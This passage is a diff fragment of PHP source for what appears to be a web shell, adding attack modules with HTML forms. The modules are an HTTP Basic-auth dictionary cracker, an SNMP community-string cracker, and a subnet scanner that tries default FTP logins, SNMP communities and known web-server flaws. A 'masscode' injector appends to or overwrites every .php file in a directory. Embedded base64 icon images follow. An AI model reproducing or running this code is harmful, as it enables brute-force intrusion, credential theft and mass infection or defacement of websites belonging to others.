width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
+}
+
+if ($act == "basicauth")
+{
+global $errorbox,$et,$t,$crack,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$data='';
+$method=($_REQUEST['method'])?'POST':'GET';
+if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
+spliturL($_REQUEST['target'],$host,$page);
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if($method='GET')$page.=$data;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+echo "<font color=blue>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$so=fsockopen($host,80,$en,$es,5);
+if(!$so){echo "$errorbox Can not connect to host$et";break;}
+else{
+$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
+if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
+$packet.="\r\n\r\n";
+$packet.=$data;
+fputs($so,$packet);
+$res=substr(fgets($so),9,2);
+fclose($so);
+if($res=='20')echo "U: $user P: $pass</br>";
+flusheR();
+}
+}
+echo "Done!</font>";
+}else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>
+HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+
+if ($act == "snmp")
+{
+global $t,$et,$errorbox,$crack,$hcwd;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+$com=trim(fgets($dictionary)," \n\r");
+$res=snmpchecK($target,$com,2);
+if($res)echo "$com<br>";
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+ echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+
+
+
+if ($act == "scanner")
+{
+global $hcwd;
+if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
+echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if (checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser="";
+if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
+echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif (!empty($_REQUEST['securityscanner'])){
+echo "<font color=yellow>";
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f = substr($from,strrpos($from,".")+1);
+$from = substr($from,0,strrpos($from,"."));
+if(!empty($_REQUEST['httpscanner'])){
+echo "Loading webserver bug list...";
+flusheR();
+$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
+$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
+flusheR();
+}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>";}
+flusheR();
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
+$open=$ser="";
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if ($scan){
+$ser="";
+if($ser=getservbyport($po,"tcp"))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+flusheR();
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo "Unknow";
+else echo $res;
+echo "<br>";
+$output=1;
+}
+flusheR();
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach ($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach ($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@USERS'))
+foreach ($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@NUKE'))
+foreach ($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+else{
+$url="http://$ip$page";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res="";
+if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
+foreach ($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms .=" $v ";
+}
+if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+flusheR();
+}
+}
+if(!empty($_REQUEST['ftpscanner'])){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach ($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=@ftp_connect($ip,21,$timeout);
+if ($ftp){
+if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
+}
+flusheR();
+}
+}
+}
+if($output)echo "<hr size=1 noshade>";
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+else{
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
+$host = substr($host,0,strrpos($host,"."));
+echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
+}
+}
+
+if ($act == "masscode")
+{
+if(isset($_POST['dir']) &&
+    $_POST['dir'] != '' &&
+    isset($_POST['filetype']) &&
+    $_POST['filetype'] != '' &&
+    isset($_POST['mode']) &&
+    $_POST['mode'] != '' && 
+    isset($_POST['message']) &&
+    $_POST['message'] != '' 
+    )
+    {
+        $dir = $_POST['dir'];
+        $filetype = $_POST['filetype'];
+        $message = $_POST['message'];
+        
+        $mode = "a"; //default mode
+        
+        
+        // Modes Begin
+        
+        if($_POST['mode'] == 'Apender')
+        {
+            $mode = "a";
+        }
+        if($_POST['mode'] == 'Overwriter')
+        {
+            $mode = "w";
+        }
+        
+        if($handle = opendir($dir))
+        {
+            ?>
+            Overwritten Files :-
+            <ul style="padding: 5px;" >
+            <?php
+            while(($file = readdir($handle)) !== False)
+            {
+                if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
+                {
+                    ?>
+                        <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
+                    <?php
+                    echo "\n";
+                    $fd = fopen($dir.$file,$mode);
+                    if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;
+                    fwrite($fd,$message);
+                }
+            }
+            ?>
+            </ul>
+            <?php
+        }
+    }
+    else
+    {
+        ?>
+        <table >
+        
+            <form method='POST'>
+            <input type="hidden" name="injector"/>  
+                <tr>
+                    <td class="title">
+                        Directory
+                    </td>
+                    <td>
+                         <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
+                    </td>
+                </tr>
+                <tr>
+                <td class="title">
+                    Mode
+                </td>
+                <td>
+                        <select style="width: 125px;" name="mode">
+                            <option value="Apender">Apender</option>
+                            <option value="Overwriter">Overwriter</option>
+                        </select>
+                </td>
+                </tr>
+                <tr>
+                    <td class="title">
+                        File Type
+                    </td>
+                    <td>
+                        <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
+                    </td>
+                </tr>
+                
+                
+                <tr>
+                    <td colspan="2">
+                        <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
+                    </td>
+                </tr>
+                
+                
+                <tr>
+                    <td rowspan="2">
+                        <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>
+                    </td>
+                </tr>
+        </form>
+        </table>
+        <?php
+    }
+}
+
+}
+else
+
+{
+
+ @ob_clean();
+
+ $images = array(
+
+"arrow_ltr"=>
+
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+
+"back"=>
+
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+
+"Wg0JADs=",
+
+"buffer"=>
+
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+
+"change"=>
+
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+
+"zMshADs=",
+
+"delete"=>
+
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+
+"download"=>
+
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+
+"forward"=>
+
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+
+"WqsJADs=",
+
+"home"=>
+
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+
+"mode"=>
+
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+
+"refresh"=>
+
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+
+"search"=>
+
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+
+"setup"=>
+
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+
+"small_dir"=>
+
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+
+"small_unk"=>
+
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+
+"yAsokBkQADs=",
+
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+
+"sort_asc"=>
+
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+
+"sort_desc"=>
+
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+
+"sql_button_drop"=>
+
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+
